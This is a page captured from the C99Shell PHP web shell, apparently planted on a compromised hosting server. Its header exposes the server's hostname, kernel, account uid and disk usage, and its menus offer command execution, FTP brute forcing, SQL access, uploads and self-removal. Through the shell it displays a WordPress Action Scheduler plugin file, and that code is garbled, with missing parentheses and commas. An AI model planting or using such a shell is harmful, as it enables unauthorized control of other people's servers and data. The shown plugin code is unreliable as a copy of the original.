!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-data/plugins/kkart-pro/packages/action-scheduler/   drwxr-xr-x
Free 293.34 GB of 429.69 GB (68.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     action-scheduler.php (1.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Plugin Name: Action Scheduler
 * Plugin URI: https://actionscheduler.org
 * Description: A robust scheduling library for use in WordPress plugins.
 * Author: Automattic
 * Author URI: https://automattic.com/
 * Version: 3.1.6
 * License: GPLv3
 *
 * Copyright 2019 Automattic, Inc.  (https://automattic.com/contact/)
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 */

if ( ! function_exists'action_scheduler_register_3_dot_1_dot_6' ) ) {

    if ( ! 
class_exists'ActionScheduler_Versions' ) ) {
        require_once( 
'classes/ActionScheduler_Versions.php' );
        
add_action'plugins_loaded', array( 'ActionScheduler_Versions''initialize_latest_version' ), 1);
    }

    
add_action'plugins_loaded''action_scheduler_register_3_dot_1_dot_6'0);

    function 
action_scheduler_register_3_dot_1_dot_6() {
        
$versions ActionScheduler_Versions::instance();
        
$versions->register'3.1.6''action_scheduler_initialize_3_dot_1_dot_6' );
    }

    function 
action_scheduler_initialize_3_dot_1_dot_6() {
        require_once( 
'classes/abstracts/ActionScheduler.php' );
        
ActionScheduler::init__FILE__ );
    }

    
// Support usage in themes - load this version if no plugin has loaded a version yet.
    
if ( did_action'plugins_loaded' ) && ! class_exists'ActionScheduler' ) ) {
        
action_scheduler_initialize_3_dot_1_dot_6();
        
do_action'action_scheduler_pre_theme_init' );
        
ActionScheduler_Versions::initialize_latest_version();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0038 ]--